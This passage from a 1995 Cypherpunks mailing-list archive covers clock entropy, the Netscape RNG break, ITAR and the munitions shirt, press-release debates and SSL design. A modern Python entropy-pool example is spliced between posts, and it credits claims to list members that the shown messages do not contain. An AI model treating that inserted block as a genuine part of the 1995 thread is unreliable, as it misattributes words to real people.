However, no encryption algorithm is specified. (The patent suggests the familiar method of seeding a PRNG with the session key, and XORing the resulting stream with the plaintext bitmap.) Assuming this is in fact the scheme PrivaSoft uses, I posit that their "crypto engine" consists of a patented (by someone who now works for them ?) protocol wrapped around a proprietary encryption algorithm. 20 characters (the patent doesn't discuss constraints on the character set, AFAIK) looks rather short. This is one possible reason for the Commerce Dept.'s export approval.

http://www.megasoft.com/privasoft/about.html discusses PrivaSoft.
ftp://town.hall.org/patent/data/05321/05321749 is the text of Patent 5,321,749.

-Futplex

From rmtodd at servalan.servalan.com Wed Sep 20 10:30:18 1995
From: rmtodd at servalan.servalan.com (Richard Todd)
Date: Wed, 20 Sep 95 10:30:18 PDT
Subject: My Day
In-Reply-To: <43oquc$70f@tera.mcom.com>
Message-ID:

In servalan.mailinglist.cypherpunks you write:
>A couple comments on using the time as a seed:
>Any system running NTP will let you know its clock to within a couple
>ms; some folks have gotten NTP accuracy down to the high hundred
>microseconds on real-time systems..

Yeah, and even if it's not running ntp full time (just doing the ntpdate hack in cron), with any justice it's still within a second of real honest-to-goodness WWV-and-friends time.

>Any entropy you get from sampling the system clock will have to come
>from the low-order bits of the tv_usec, or equivalent, and you'll only
>get a few bits per sample.

Maybe not even that; does anybody know which of the popular machines actually have microsecond timers, so that gettimeofday() actually returns continuously updated microsecond values in between clock ticks? If you don't have that, your entropy in those low order bits is definitely gonna be pretty slim, since you're basically measuring the entropy in the "drift" values ntpd is applying, which don't change very quickly.
I know BSDI actually uses one of the peecee timer registers to implement a microsecond timer, so you actually get decent time resolution; dunno if the other peecee *BSD releases do the same.

From devans at hclb.demon.co.uk Wed Sep 20 10:32:17 1995
From: devans at hclb.demon.co.uk (Dave Evans)
Date: Wed, 20 Sep 95 10:32:17 PDT
Subject: [NOISE] Unabomber - crypto-anarchist?!?
In-Reply-To:
Message-ID: <811635300snx@hclb.demon.co.uk>

In article you write:
>
> But I also searched the text for mention of "crypto" and only came up with
> the fairly standard usage of "crypto leftist." My assumption then is that
> the meme of crypto anarchy has spread to the writer at that UK newspaper (I
> wonder if Brian Arthur has been talking to them?) and that he interprets
> FR's screed in terms of crypto anarchy?
>

Partially true, as there was an article on the leader page in Monday's printed edition entitled "You can't put the Internet genie back in the bottle" by Boris Johnson. It's probably on the ET by now, but I don't know where. Some quotes:

"But we make three points in defense of progress.

"The first, which has already been made, is that you can't put the genie back in the bottle. Next, we set against the presence of this offensive matter [porn] the way the Internet can liberate in its sheer prolixity. We rejoice, for instance, at how some surfer exposed the claptrap of L. Ron Hubbard's Scientology by publishing his "secret" texts, knowledge of which had previously cost his disciples many thousands of pounds. We think again of those women in the basements of Tehran, or any other place where freedom of expression is denied.

"if there is no control over what people may read, then wherever there are computers and telephone lines, totalitarianism will be that much more precarious."

From kinney at bogart.Colorado.EDU Wed Sep 20 10:39:49 1995
From: kinney at bogart.Colorado.EDU (W. Kinney)
Date: Wed, 20 Sep 95 10:39:49 PDT
Subject: MacRandoms
Message-ID: <199509201739.LAA12651@bogart.Colorado.EDU>

OK, to get my implementation of Colin's randpool code for the Macintosh, ftp://ftp.csua.berkeley.edu/pub/cypherpunks/randomness/MacRandoms.sea.hqx

As a bonus, this also includes a nice 68K assembler implementation of MD5. Enjoy.

-- Will

From tcmay at got.net Wed Sep 20 10:43:54 1995
From: tcmay at got.net (Timothy C. May)
Date: Wed, 20 Sep 95 10:43:54 PDT
Subject: Cypherpunks Press release
Message-ID:

At 4:28 PM 9/20/95, Dietrich J. Kappe wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>We've seen the word "hacker" kicked around rather arbitrarily in the press.
>Are we to conclude that the cypherpunks are a bunch of hackers? I think it's
>time for some cypherpunks spin. How about a logo *and* a press release? The
>press release would give contacts (email, phone, etc.) so that someone on
>this list would be contacted by journalists when a crypto story breaks.
>
>If we get enough volunteers, we can fax blanket every newspaper, station,
>and network in the world.

I was of course being facetious about the putative "Cypherpunks logo." Sorry I did not insert smileys.

The problem with the "Cypherpunks press release" notion is this:

-- we are an effective anarchy.

-- there is no "spokespunk" and no foreseeable way of choosing one.

Some people seem to _want_ some kind of central contact organization or point, some place to lobby, buy advertising, send faxes, give press conferences, etc. But I don't see it happening. Individuals and their organizations are free of course to do as they wish, but if they claim to speak for "the Cypherpunks," they'll be out of line. We are not a direct democracy, nor even are we a representative democracy. No board of directors, etc. While this undeniably affects how "messages" get out, that's life.

There are plenty of organizations with Washington offices, and with spokesmen available for comment. But they don't have what we have.
--Tim May
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^756839 | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From fair at clock.org Wed Sep 20 10:51:33 1995
From: fair at clock.org (Erik E. Fair (Time Keeper))
Date: Wed, 20 Sep 95 10:51:33 PDT
Subject: RSA Prevails In Arbitration Against Cylink
Message-ID:

Is there electronic copy of the Arbitration Panel's precise ruling available? No quicker way to end the PR confusion than to read the Real Thing(tm).

Erik

From joelm at eskimo.com Wed Sep 20 11:04:34 1995
From: joelm at eskimo.com (Joel McNamara)
Date: Wed, 20 Sep 95 11:04:34 PDT
Subject: Announce: Private Idaho beta release
Message-ID: <199509201802.LAA10836@mail.eskimo.com>

I've finally gotten some time to incorporate a few new features/bug fixes into Private Idaho (Windows remailer/PGP front-end). The 2.5b4 release now incorporates an easy interface to the alpha.c2.org nym server. Also, simple scripting is available for moving messages to e-mail apps that don't support sequential header tabbing (Free Agent, Netscape, etc.). The next available block of time will likely be devoted to incorporating background POP3 scanning and downloading of PGP messages.

http://www.eskimo.com/~joelm - for your downloading please...

Joel McNamara
joelm at eskimo.com - http://www.eskimo.com/~joelm for PGP
Thomas Jefferson used strong crypto, shouldn't you?
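The entropy-pool discipline from the randomness thread above (Kinney: MD5 "launders" mouse positions and microsecond timings, and no 128-bit key is issued until 128 bits of entropy have been estimated; Carp's and Todd's point that regular mouse motion and coarse clocks yield few bits) as an added Python example. It is not Kinney's MacRandoms, Colin Plumb's randpool, or PGP's code: the 64-byte pool, the delta-based credit rule capped at 8 bits per event, and the mouse traces are all constructed assumptions.

```python
"""Entropy pool with an entropy estimate (added example, not code from the
thread). Assumed: 64-byte pool, MD5 as the mixer, and a PGP-style credit
rule on first/second/third-order timestamp deltas, capped at 8 bits/event."""
import hashlib
import struct


class InsufficientEntropy(Exception):
    """Raised when a key is requested before enough entropy has been fed in."""


class RandPool:
    POOL_BYTES = 64           # four MD5 output blocks of state (assumed size)
    MAX_BITS_PER_SAMPLE = 8   # never trust one mouse event for more (assumption)

    def __init__(self):
        self.pool = bytearray(self.POOL_BYTES)
        self.entropy_bits = 0         # conservative running estimate
        self._last_t = None           # previous timestamp (usec)
        self._last_d1 = None          # previous first-order delta
        self._last_d2 = None          # previous second-order delta

    def _stir(self, data):
        """Launder `data` into the pool: chain MD5 over each 16-byte block so the
        whole state depends on everything fed in. MD5 mixes; it creates no entropy."""
        prev = hashlib.md5(data).digest()
        for i in range(0, self.POOL_BYTES, 16):
            blk = hashlib.md5(prev + bytes(self.pool[i:i + 16])).digest()
            self.pool[i:i + 16] = blk
            prev = blk

    def _timing_credit(self, t_usec):
        """Credit only what timing jitter supports: the smallest of the first-,
        second- and third-order deltas bounds how unpredictable the event was.
        A metronomic stream (constant spacing) earns nothing at all."""
        if self._last_t is None:
            self._last_t = t_usec
            return 0
        d1 = t_usec - self._last_t
        self._last_t = t_usec
        if self._last_d1 is None:
            self._last_d1 = d1
            return 0
        d2 = d1 - self._last_d1
        self._last_d1 = d1
        if self._last_d2 is None:
            self._last_d2 = d2
            return 0
        d3 = d2 - self._last_d2
        self._last_d2 = d2
        smallest = min(abs(d1), abs(d2), abs(d3))
        if smallest == 0:
            return 0
        return min(smallest.bit_length() - 1, self.MAX_BITS_PER_SAMPLE)

    def add_mouse_sample(self, x, y, t_usec):
        """Feed one mouse event. Position is mixed in but earns no credit
        (too guessable); only timing jitter is credited."""
        credit = self._timing_credit(t_usec)
        self._stir(struct.pack(">iiq", x, y, t_usec))
        self.entropy_bits += credit
        return credit

    def get_key(self, nbits):
        """Return nbits of key material, or refuse if the estimate is short."""
        if nbits % 8:
            raise ValueError("nbits must be a multiple of 8")
        if self.entropy_bits < nbits:
            raise InsufficientEntropy(
                "pool holds ~%d bits, %d requested" % (self.entropy_bits, nbits))
        out, counter = b"", 0
        while len(out) < nbits // 8:
            out += hashlib.md5(bytes(self.pool) + struct.pack(">I", counter)).digest()
            counter += 1
        self._stir(out)               # advance state so the key cannot be re-derived
        self.entropy_bits -= nbits    # the key carried that much out of the pool
        return out[:nbits // 8]


def feed_trace(pool, trace):
    """Feed a list of (x, y, t_usec) events; return the total credited bits."""
    return sum(pool.add_mouse_sample(x, y, t) for x, y, t in trace)


# Constructed traces (not real captures).
REGULAR_SWIRL = [(100 + i, 100, i * 1000) for i in range(40)]   # exactly one event per ms
JITTERED = [(100, 100, t) for t in (0, 1000, 1300, 2500, 2700, 4100, 4150, 6000)]
_SPACINGS = [1200, 350, 2100, 700, 1600, 90, 2700, 480, 1900, 230, 3300, 810]


def jittered_trace(n_events):
    """Longer constructed trace whose event spacings cycle through _SPACINGS."""
    t, trace = 0, []
    for i in range(n_events):
        t += _SPACINGS[i % len(_SPACINGS)]
        trace.append((100 + (i * 7) % 50, 100 + (i * 3) % 50, t))
    return trace


if __name__ == "__main__":
    print("metronomic swirl:", feed_trace(RandPool(), REGULAR_SWIRL), "bits")  # 0
    p = RandPool()
    print("short jittered trace:", feed_trace(p, JITTERED), "bits")             # 36
    feed_trace(p, jittered_trace(60))
    print("after more input:", p.entropy_bits, "bits; key", p.get_key(128).hex())
```

A pool fed only the metronomic swirl never reaches 128 bits, so `get_key(128)` keeps raising until real jitter arrives; that refusal, not the hash, is what stops a weak session key.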
From frissell at panix.com Wed Sep 20 11:12:55 1995
From: frissell at panix.com (Duncan Frissell)
Date: Wed, 20 Sep 95 11:12:55 PDT
Subject: Cypherpunks Hold a Cracking Party
Message-ID: <199509201812.OAA28709@panix.com>

At 11:28 AM 9/19/95 -0400, Duncan Frissell wrote:
>Just to let everyone know that I've got an assignment from Wired to do a
>story with the above working title.
>

As it turns out, Steven Levy and I had an assignment collision at Wired and were both assigned the story. For some unknown reason, they wanted him to do it instead of me so I will *not* be doing it.

Steve -- feel free to use my title if you like.

DCF

"Anyone know any publications interested in an article on the Crack?"

From klp at gold.tc.umn.edu Wed Sep 20 11:16:30 1995
From: klp at gold.tc.umn.edu (Kevin L Prigge)
Date: Wed, 20 Sep 95 11:16:30 PDT
Subject: Cypherpunks Press release
In-Reply-To:
Message-ID: <30605a7539c7002@noc.cis.umn.edu>

A little birdie told me that Dietrich J. Kappe said:
>
> -----BEGIN PGP SIGNED MESSAGE-----
>
> We've seen the word "hacker" kicked around rather arbitrarily in the press.
> Are we to conclude that the cypherpunks are a bunch of hackers? I think it's
> time for some cypherpunks spin. How about a logo *and* a press release? The
> press release would give contacts (email, phone, etc.) so that someone on
> this list would be contacted by journalists when a crypto story breaks.
>

I think that a press release would be hard, based on the fact that there is no central organization here on the cypherpunks list. I know that in times past, Eric Hughes has been quoted in the press, as well as Tim, and perhaps others (forgive my lack of memory), but there is no approved spokesperson because there is no organization.

> If we get enough volunteers, we can fax blanket every newspaper, station,
> and network in the world.

Does anyone know exactly how the press contact thing works?
My impression is that a reporter/journalist stumbles on to someone who knows something about a particular area, and is willing to be interviewed. Then the next time a story comes along that deals even slightly with that subject, the reporter will tend to contact that person.

--
Kevin Prigge | Holes in what's left of my reason,
CIS Consultant | holes in the knees of my blues,
Computer & Information Services | odds against me been increasin'
email: klp at cis.umn.edu | but I'll pull through...

From tcmay at got.net Wed Sep 20 11:17:18 1995
From: tcmay at got.net (Timothy C. May)
Date: Wed, 20 Sep 95 11:17:18 PDT
Subject: Munitions shirt (again)
Message-ID:

At 3:49 PM 9/20/95, Ian Goldberg wrote:
>So, Dave and I got free munitions shirts (they're different, though;
>the font is smaller and they have a bunch of X'd out Constitutional
>Amendments on the back; I think they were designed by Joel Furr) for
>our bug find.
>
>So I'm wearing it today. The thing is, I live in International House,
>a residence that has 50% non-Americans.
>
>So, any consensus as to whether it's actually illegal to do so? I
>remember some disagreement a few weeks ago that AFAIK wasn't resolved.

The _consensus_ here seems to be: "This t-shirt is illegal to wear in front of non-Americans," judging by the comments here.

The _reality_ is quite different, I think, and the "this shirt is illegal" hype is, in my opinion, just that, hyperbole. Even hyperbull, too.

Books and written articles containing crypto algorithms are _not_ illegal for "furriners" to look at. The t-shirt contains at most a fuzzy printing of an algorithm that has been widely printed in various books and in articles in mailing lists like ours. (I agree that there are some unresolved issues with ostensibly machine-readable forms. The t-shirt is not machine-readable by any plausible interpretation of machine-readable.)
>As far as I can tell, it's _technically_ illegal, but any LEO would be
>out of his mind to try to enforce it (it would have to be a Fed, too,
>wouldn't it? Or can regular city cops get you for violating export
>restrictions?).

Ian did great work on the latest Netscape break, but this is just plain crazy.

--Tim May
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^756839 | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From vznuri at netcom.com Wed Sep 20 11:58:55 1995
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Wed, 20 Sep 95 11:58:55 PDT
Subject: netscape bug
Message-ID: <199509201855.LAA17261@netcom16.netcom.com>

clearly the netscape engineers did not practice "safe crypto programming", but I question the seriousness of the crack. none of the articles mention that the cracker must have login access to the computer that the random numbers are generated on. is this true? does the code require knowledge of the PID etc. that can only be obtained by a login to the system that the netscape session is running on?

if this is true (i.e. login access required) this bug is by far not as serious as some of the hyperbole is suggesting. I agree it is still very insecure but the most dangerous crypto bugs are those where you can determine keys from data alone.. physical penetration into a machine is another level of security..

furthermore, I would like to commend Netscape for their fast response to the problem and apparent commitment to establishing safeguards that avoid it in the future.
cypherpunks have an easy time ridiculing someone who slit their throat on writing some crypto functions, but geez, cut them some slack: crypto stuff has so many pitfalls and bugaboos that even the world-class experts make mistakes. where else can not properly "burning" stack registers (function parameters) and environment variables be considered "lethal"??? PGP errors have been reported on numerous occasions, some in the randomizer code. do people call for Zimmermann's head on a stick and call him "incompetent"?

often when cryptographers say something is "broken" it can still mean that it is not necessarily unsafe in practice. there are many shades of "broken", some requiring a Cray and others requiring a PC. I am really surprised how much people here consider "broken is broken". this is only the extreme theoretical perspective. granted I am not advocating that people *not*fix* bad crypto functions, I'm only saying that maybe it's not in everyone's best interest to run around and say "the sky is falling" and lambaste companies for minor difficulties..

Netscape is a world class product, and it's *free*. on this cypherpunks list, I have seen no end to the venomous criticisms that people level at *free* products, which IMHO is quite tasteless at times. Netscape has done far more for the cypherpunk cause than many, many companies just by including RC4 in their product. they have taken some heat for their decisions & code, but they are on the front lines of battle.

now instead of our vague claims about how the world can benefit from good crypto, how it is immensely valuable and important to cyberspatial financial transactions, to promote the cypherpunk cause, we now have something *popular*, *physical*, and *tangible* to point to: netscape!! this is *not* vaporware. this is not some cpunk saying, "all one needs is [x] algorithm running on [y] network and you have a world class infrastructure".
the amount of work to get something like Netscape into the world is quite daunting and herculean. we owe a great debt to netscape and their accomplishments for furthering our own agenda!!! please do not trivialize what they have accomplished!! Netscape is here, it works, and it is cyberspatial crypto that Joe Sixpack can understand and *use*!! it is not a toy remailer, it is not some PGP front end, it is not some mailer script, *this* is the format in which Joe Sixpack will be using crypto in the future, the format which will bring "crypto to the unwashed masses"!!

Netscape may very well be the chief vehicle that puts *concrete pressure* on our government to relax crypto export laws. I see this happening *right now* with them going to a 64 bit key from a 40 bit one, and the world starting to realize the importance of crypto and the idiocy of the export laws. I am really amazed at how few seem to be supporting Netscape here and considering them the *premiere ally* in our current battle. it reminds me of how much people here rant at Microsoft when virtually no other company on the planet could pull off what they make look easy (ah, that's another story I've filled up other posts with).

please do *not* take an adversarial relationship with the companies who are helping advance the cutting edge of cyberspace!! do *not* ridicule them. rather, help them to understand their problems. I think you will find that most companies are *not* hostile to improving their software, and will readily admit it when it needs fixing (intel has been humbled by their pentium glitch, and I doubt any company again will ever be so obstinate and belligerent..) .
I am willing to bet that the netscape bug would have been fixed quickly if it had been quietly brought to their attention, without the blaring media lights (I enjoy the media circus as much as the next guy, but on the other hand, doing some things quietly may actually advance the cypherpunk cause further than by making a noisy hullabaloo in cyberspace).

once again I commend Netscape for their fine software and willingness to perfect it. netscape is at the cutting edge of advancing key cyberspace technologies and it is not surprising that they make some minor mistakes with the code in these early phases. cyberspace is very young!! give designers a bit of time to get it right. be patient!! do not accuse them of incompetence!! netscape is tens of thousands of lines of world-class code. only in programming can a few moments of total, rapt attention lead to bugs that get blared on the front page of new york times and affect your stock price!! good lord, give the guys a break.

cpunks: when Netscape has some serious competitors, they will get their act together. but at the moment they are the only game in town, and it will pay off to be nice to them, and try to support them, instead of kicking them in the teeth and wringing them every time they make a mistake. few in the world are as knowledgeable or paranoid as we are about security, and it's going to be a gradual process to get to even a fraction of the expertise here penetrating the mainstream software industry. be patient!!

--

P.M. notes that anywhere there is a data-driven buffer overflow (which he suspects are all over netscape) he can get code to execute anything he wants. this reminds me of the Morris internet worm that ran exactly the same way. it used a bug in the finger daemon that caused a string buffer overwrite (via strcpy, instead of strncpy) to execute customized code.

my question: I have not seen the specifics of how this works.
does this require specialized knowledge of the native machine language on the host machine? or is it just used to cause something like a core dump to get a command line or something like that?

--Vlad Nuri

From kelli at zeus.towson.edu Wed Sep 20 12:00:43 1995
From: kelli at zeus.towson.edu (K. M. Ellis)
Date: Wed, 20 Sep 95 12:00:43 PDT
Subject: Cypherpunks Press release
In-Reply-To:
Message-ID:

On Wed, 20 Sep 1995, Dietrich J. Kappe wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
>
> We've seen the word "hacker" kicked around rather arbitrarily in the press.
> Are we to conclude that the cypherpunks are a bunch of hackers? I think it's
> time for some cypherpunks spin. How about a logo *and* a press release? The
> press release would give contacts (email, phone, etc.) so that someone on
> this list would be contacted by journalists when a crypto story breaks.
>
> If we get enough volunteers, we can fax blanket every newspaper, station,
> and network in the world.
>
>

I've got a pretty effective list of fax numbers...everything from the fox network to CBS' Eye on America show. Anyone can contact me if you need 'em.. I'm sure we could put them to good use.

-=Kathleen M. Ellis=- kelli at zeus.towson.edu Geek Code v3.0 http://zeus.towson.edu/~kelli/
GAT dx s++:- a-- C++ uu+++ P+ L++ E- W++ N K W--- O- M- V-- PS+++ PE- y+>+(-) PGP+>++ t+ 5 x+ R tv b+++ DI- D--- G e h* r+ z**
Diverse Sexual Orientation Coll.Towson State University DSOC at zeus.towson.edu
"All the world will be your enemy, Prince With The Thousand Enemies. . . And whenever they catch you, they will kill you. But first, they must catch you. . ." -Richard Adams

From Andrew.Spring at ping.be Wed Sep 20 12:08:47 1995
From: Andrew.Spring at ping.be (Andrew Spring)
Date: Wed, 20 Sep 95 12:08:47 PDT
Subject: MD5 in Eudora
Message-ID:

I was just poking around in Eudora for the Mac with ResEdit, and I found a CODE resource labelled MD5. Any idea why Eudora is using MD5 hashes?
From sdw at lig.net Wed Sep 20 12:23:51 1995
From: sdw at lig.net (Stephen D. Williams)
Date: Wed, 20 Sep 95 12:23:51 PDT
Subject: Cypherpunks Press release
In-Reply-To:
Message-ID:

>
> -----BEGIN PGP SIGNED MESSAGE-----
>
> We've seen the word "hacker" kicked around rather arbitrarily in the press.
> Are we to conclude that the cypherpunks are a bunch of hackers? I think it's
> time for some cypherpunks spin. How about a logo *and* a press release? The
> press release would give contacts (email, phone, etc.) so that someone on
> this list would be contacted by journalists when a crypto story breaks.
>
> If we get enough volunteers, we can fax blanket every newspaper, station,
> and network in the world.
>
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
>
> iQBgAwUBMGBA2XIf3YegbdiBAQG0RQJXdWG0beFoFEk6BfEkhIDYxB6NsbSSIGWe
> Nzob7W7Gd/YyRqsVhU5T8jQEpD6sNLwTP+4SypSC9Mk8EauKAvklHkkfGr53scQh
> 5Tzp
> =Fxdn
> -----END PGP SIGNATURE-----
>
> Dietrich Kappe | Red Planet http://www.redweb.com
> Red Planet, LLC| "Chess Space" | "MS Access Products" | PGP Public Key
> 1-800-RED 0 WEB| /chess | /cobre | /goedel/key.txt
> Web Publishing | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84

(I hate to suggest this, but someone has to throw the idea out.)

We could always threaten to sue for defamation... (You can fill in any one of a number of differences between the canonical cypherpunk vs. hacker/cracker.) Specify the clarification has to include logo.

sdw
--
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw at lig.net http://www.lig.net/sdw Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011 OO/Unix/Comm/NN ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W Pres.:Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95

From conrad at unix-ag.uni-kl.de Wed Sep 20 12:24:53 1995
From: conrad at unix-ag.uni-kl.de (Peter Conrad)
Date: Wed, 20 Sep 95 12:24:53 PDT
Subject: Linking = Showing = Transferring?
In-Reply-To: <10345.9509151143@exe.dcs.exeter.ac.uk>
Message-ID: <9509201922.AA11324@pizza.unix-ag.uni-kl.de>

-----BEGIN PGP SIGNED MESSAGE-----

Hi,

> Browser in the US, text in US, crypto gif imported from UK, both legal.
>
> Browser outside US, text in US, crypto gif imported from UK, both legal.
>
> See a flaw in that?

Not directly, but... what if for some strange reason the image is routed through US gateways on its way from the UK to, for example, Germany? I mean, The Net (tm) is a strange beast, and you can rarely tell which way the message flows... you can't even DO anything about it.

Bye,
Peter

- --
Peter Conrad | "Those people who tell you not to take chances, they are all
Am Heckenberg 1 | missing on what life's about, you only live once, so take
56727 Mayen | hold of the chance, don't end up like others the same song
Germany | and dance!" - Metallica, 'Motorbreath'
Email: p_conrad at informatik.uni-kl.de,conrad at unix-ag.uni-kl.de

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAgUBMGBpBbFFskV8RCVHAQGyEwQA2QD4FdrHzKAiiiA/MneC66SU8SBo5neS
3kErDNJZQ1vK5qSR7XuSQSJY/svW3F6YozmgG7YD8RcYwoY8O3OjSaEaOmrRqpIi
qftdceLmf5o9O1NktXBLEPTw/qm4IOVwTD4l2P+zsbwvuZpHYt8hBg3bLZm2Xtvy
1OzPp95OzTE=
=HqWo
-----END PGP SIGNATURE-----

From kelli at zeus.towson.edu Wed Sep 20 12:28:51 1995
From: kelli at zeus.towson.edu (K. M. Ellis)
Date: Wed, 20 Sep 95 12:28:51 PDT
Subject: My new perspective on ITAR (was Re: Munitions shirt (again)
In-Reply-To: <199509201549.IAA19844@cuzco.CS.Berkeley.EDU>
Message-ID:

On Wed, 20 Sep 1995, Ian Goldberg wrote:
> So, Dave and I got free munitions shirts (they're different, though;
> the font is smaller and they have a bunch of X'd out Constitutional
> Amendments on the back; I think they were designed by Joel Furr) for
> our bug find.

Good.

>
> So I'm wearing it today. The thing is, I live in International House,
> a residence that has 50% non-Americans.
>
> So, any consensus as to whether it's actually illegal to do so?
> I
> remember some disagreement a few weeks ago that AFAIK wasn't resolved.
>
> As far as I can tell, it's _technically_ illegal, but any LEO would be
> out of his mind to try to enforce it (it would have to be a Fed, too,
> wouldn't it? Or can regular city cops get you for violating export
> restrictions?).
>
> - Ian
>

Funny, this thread sounds awfully familiar. In fact, I think I wrote almost this _exact same post_ about 3 weeks ago, just substituting "Berkeley" for "Towson State University". I mentioned the fact that I live in the International House of _my_ campus, and we discussed the legality of my wearing it. We hashed over it for a few days, and never really came to a real answer, since ITAR is rather vague in that area.

I might add, however, that two days ago I wore my RSA shirt to my sound design class, where the guy I happened to sit down next to recognized it, was familiar with what it stood for, and knew all about the Zimmermann case; not because he was a crypto enthusiast or a comp sci major, but because he works for customs at Baltimore-Washington International Airport. This event really changed my point of view considering ITAR... I figured that it was just one of those dumb laws that _nobody_ really paid much attention to except for the FBI and that was only because they were looking for a way to nail Zimmermann for writing good crypto. I had assumed that ITAR was something that customs agents/L. E. O's/etc. learned about, took a test on it, then forgot about it the next day. Interesting... they _really_ are serious, aren't they?

-=me=- kelli at zeus.towson.edu Geek Code v3.0 http://zeus.towson.edu/~kelli/
GAT dx s++:- a-- C++ uu+++ P+ L++ E- W++ N K W--- O- M- V-- PS+++ PE- Y++(-) PGP+>++ t+ 5 x+ R tv b+++ DI- D--- G e h* r+ z**
Diverse Sexual Orientation Coll.Towson State University DSOC at zeus.towson.edu
"All the world will be your enemy, Prince With The Thousand Enemies. . . And whenever they catch you, they will kill you.
But first, they must catch you. . ." -Richard Adams

From vznuri at netcom.com Wed Sep 20 12:31:48 1995
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Wed, 20 Sep 95 12:31:48 PDT
Subject: cypherpunks press releases/contact list: YES!! DO IT!!
Message-ID: <199509201928.MAA20230@netcom16.netcom.com>

I'm going to argue against TCM and others who are opposed to a "cypherpunk press release" because this is not an "organized group". a press release mechanism is one way by which the organization of this group can be increased. and I'm going to say something heretical in cypherpunk circles, but imho, ORGANIZATION == POWER. this is a basic rule of life that all the rabid libertarians and cryptoanarchist loners here hate to admit, but it's really true and inescapable.

anyone who wants to issue press releases for the "cypherpunks", I say, GO FOR IT. don't let someone discourage this because this is an "anarchy". that's actually an excellent reason for you to JUST DO IT!! some will be willing to have their names on the list, and they will email you. others will flame you and not want their name included. simply ignore the latter category!!

the cypherpunk logo is not copyrighted. no one has any say on who or what a "cypherpunk" is. so, let someone pick a reality and let it prosper or wilt by assent and "voting with the feet". just be careful not to misrepresent anyone.

start a list, just like anyone can start a FAQ. a list of names to contact and their specialties would be *excellent* for this purpose. occasional press reports on what is happening on list traffic would be very useful, too.

look, there are some very tangible and definite ways to advance the cypherpunk agenda. there are many here who like to play in the dark and shadows and not make any noise. that's fine!! but don't expect everyone to share your disinterest in publicity or organization. if this is in fact an anarchy, why are you discouraging anyone from pursuing that which interests them??
IMHO playing in the dark, not trying to appeal to the widespread masses through the media and everything else at hand, is just the NSA's way of trying to manipulate reality through "back door" approaches.

I again suggest that a simple list of people here who are willing to talk to the press, organized under their expertise/speciality, is an *excellent* idea that is an idea whose time has come. this is such a great idea that *I* may do it if nobody does it after a week or two.

--Vlad Nuri

From alano at teleport.com Wed Sep 20 12:33:26 1995
From: alano at teleport.com (Alan Olsen)
Date: Wed, 20 Sep 95 12:33:26 PDT
Subject: Netscape sub rosa?
Message-ID: <199509201933.MAA19342@desiree.teleport.com>

At 12:30 AM 9/20/95 -0700, you wrote:
>
>Gee, where's that "Cypherpunks logo" when you really need it?
>
>A rose covering the Netscape "N" logo? A crypto eagle swooping down and
>pecking at weak keys?
>
>Netscape sub rosa?

Or a big burning Netscape logo?

Or an NSA agent licking the hot end of an electrical power cord for a Cray?

Or a picture of a lock with a big bullet hole through it?

Oh no! Not the "Logo Wars(tm)" again!

| Visualize whirled keys                          | alano at teleport.com |
|"It's only half a keyserver. I had to split the  | Disclaimer:         |
|other half with the government man." - Black Art | Ignore the man      |
|  -- PGP 2.6.2 key available on request --       | behind the keyboard.|
| http://www.teleport.com/~alano                  |                     |

From hallam at w3.org Wed Sep 20 12:37:53 1995
From: hallam at w3.org (hallam at w3.org)
Date: Wed, 20 Sep 95 12:37:53 PDT
Subject: Please send me SSL problems...
In-Reply-To:
Message-ID: <9509201937.AA00765@zorch.w3.org>

>Jeff, the SSL specification has a severe *architectural* problem - it
>assumes that Internet Protocols are APIs - interface standards, and that
>you can just slide a "layer" underneath without anyone noticing.
>Such is
>not the case - all the Internet Protocols are real protocol standards, in
>that they specify the syntax, order, and semantics of the actual bits on
>the wire. The IETF quite explicitly doesn't care about APIs - that's a host
>software issue, and it doesn't matter what the host software looks like (or
>even what the machine looks like), so long as it gets the bits on the wire
>right, according to the protocol spec. This is how the Internet can make
>very strong guarantees about interoperability.

I agree with parts of this and disagree with other parts. The IETF does not as a whole care about APIs. The one exception being the GSS API which appears to be intended as a means of circumventing ITAR. Nobody asked me about GSS API but a lot of people have assumed that because it comes from the IETF it should be the basis for the Web security protocols. I'm afraid that I can't see any real connection between the GSS view of the world and my own. Hence I find that API more of a hindrance (having to explain why not to use it) rather than a help.

The specific criticism of SSL, that it is layer replacement, highlights a fundamental error made by many IETF people. The purpose of a layered protocol model is precisely to permit the underlying layers to be altered without affecting the upper layers. NNTP runs very happily on either TCP/IP or on DECnet for example.

Where I think SSL went wrong was in the approach taken to URLs. Rather than define HTTPS://foo.com/ it should specify a new transport HTTP://foo.com:80:SSL/ I think the blame for that mess should be laid at another door however. Basically the URI working group should have understood this issue and defined a syntax for handling both SSL like objects and also DECNET, ATM. This would fit much better with the idea of SSL as being a wrapper for an arbitrary protocol.

I think it's worth pointing out that the people working at Netscape now are a rather different bunch to the original team.
Phill

From liberty at gate.net Wed Sep 20 12:49:09 1995
From: liberty at gate.net (Jim Ray)
Date: Wed, 20 Sep 95 12:49:09 PDT
Subject: Munitions shirt (again)
Message-ID: <199509201945.PAA54022@tequesta.gate.net>

-----BEGIN PGP SIGNED MESSAGE-----

Ian Goldberg wrote:
>>So, any consensus as to whether it's actually illegal to do so? I
>>remember some disagreement a few weeks ago that AFAIK wasn't resolved.

And Tim replied:
>The _consensus_ here seems to be: "This t-shirt is illegal to wear in front
>of non-Americans," judging by the comments here.

